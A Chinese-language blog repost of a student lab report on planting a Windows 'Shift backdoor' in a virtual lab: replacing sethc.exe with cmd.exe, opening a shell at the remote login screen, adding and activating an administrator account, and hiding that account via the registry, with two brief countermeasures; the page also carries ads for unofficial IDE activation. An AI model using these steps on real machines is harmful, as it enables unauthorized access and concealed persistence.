创建shift后门实验总结_shift加delete

创建shift后门实验总结_shift加delete一、实验目的及要求 1.学会创建Shift后门 2.掌握shift后门的原理 二、实验设备(环境)及要求 PC机,VC++等,虚拟云平台 三、实验内容与步骤 1.在192.168.1.3的虚拟机上打开cmd命令指示符; 2.输入“cdc:\WINDOWS\system32”,进入该文件夹; 3.输入…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、实验目的及要求

1. 学会创建Shift后门

2.掌握shift后门的原理

 

二、实验设备(环境)及要求

   PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.在192.168.1.3的虚拟机上打开cmd命令指示符;

2.输入“ cd  c:\WINDOWS\system32”,进入该文件夹;

3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份;

4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”;

5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用;

6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序;

7.输入“192.168.1.3”,点击连接;

8.当出现登录界面时,按5下shift键可进入目标机的cmd中;

9.在cmd中输入“net user hack 123 /add”,创建用户;

10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活;

11.用hack用户登录目标机。

 

 

四、实验结果与数据处理

1.对192.168.1.3的虚拟机的命令操作

 

 

创建shift后门实验总结_shift加delete

 

2.使用粘滞键

创建shift后门实验总结_shift加delete

 

 

 

 

3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活

创建shift后门实验总结_shift加delete

 

 

 

 

4.成功登录目标机

 

 

 

 

 

 

创建shift后门实验总结_shift加delete

 

 

五、分析与讨论

  1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

  2.防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

3.如何创建隐藏用户:

  创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/192139.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 浏览器缓存机制详解

    浏览器缓存浏览器缓存的知识是前端工程师必须要掌握的,因为这些知识直接影响到你的页面的用户体验,影响到你的页面的加载策略。接下来将要详细的讲述浏览器缓存的概念和原理,新人要仔细阅读,甚至要多次反刍,

    2021年12月24日
  • Linux-权限管理(你听过777、755、644吗)

    Linux-权限管理(你听过777、755、644吗)你听过777、755、644吗?文章目录组rwx权限修改权限-chmod修改文件所有者-chown修改文件所在组-chgrp

  • 图像的卷积操作

    图像的卷积操作原理:给定一个奇数尺寸大小的卷积核,对图像进行卷积操作。因为使用奇数尺寸大小的卷积核,其锚点正好在卷积核正中央的位置。如下图中间画了一个锚的就是锚点使锚点覆盖在待计算像素上面,然后计算像素值与被覆盖的卷积核中的值的乘积和。将这个和赋值给当前像素,这就是卷积的过程。公式如下所示此处会有一个问题,如果锚点落在第一个像素点(1,1)上,卷积核当中锚点左侧和上方的卷积值超出了图像的边界外…

  • Springboot自动装配原理_自动装配原理

    Springboot自动装配原理_自动装配原理springboot自动装配原理详解1)传统ssm整合redis的时候需要在xml的配置文件中进行大量的配置Bean我们在这里使用springboot来代替ssm的整合,只是通过xml的形式来整合redis第一步:加入配置<dependency><groupId>org.springframework.data</grou…

  • Java–String、StringBuilder及StringBuffer区别及性能对比

    Java–String、StringBuilder及StringBuffer区别及性能对比【学习背景】主要是想通过OpenJDK提供的JMH工具测试下String、StringBuilder及StringBuffer字符串拼接的效率如何~关于JMH的介绍及具体使用,我的这篇博文中有介绍:Java–☀️面试官:LinkedList真的比ArrayList添加元素快?❤️‍本文通过OpenJDKJMH带你揭开真相《⭐建议收藏⭐》当然,除了主要验证三者的字符串拼接效率之外,还会对三者做一些区别分析及常见面试问题总结,希望加深自己对这三者的认知,分享出来,也希望能帮助到有需要的小伙伴~

  • vdbench的作用_vdbench

    vdbench的作用_vdbench一、vdbench安装1、安装java:java-version(vdbench的运行依赖于java)2、检测vdbench能够使用:进入vdbench相应目录下./vdbench-t来测试一下vdbench的可用性,如果正常,会在目录下自动生成一个output目录。root@node1:/home/vdbench/vdbench50406#./vdbench-t如果报错,则需修改vdb…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号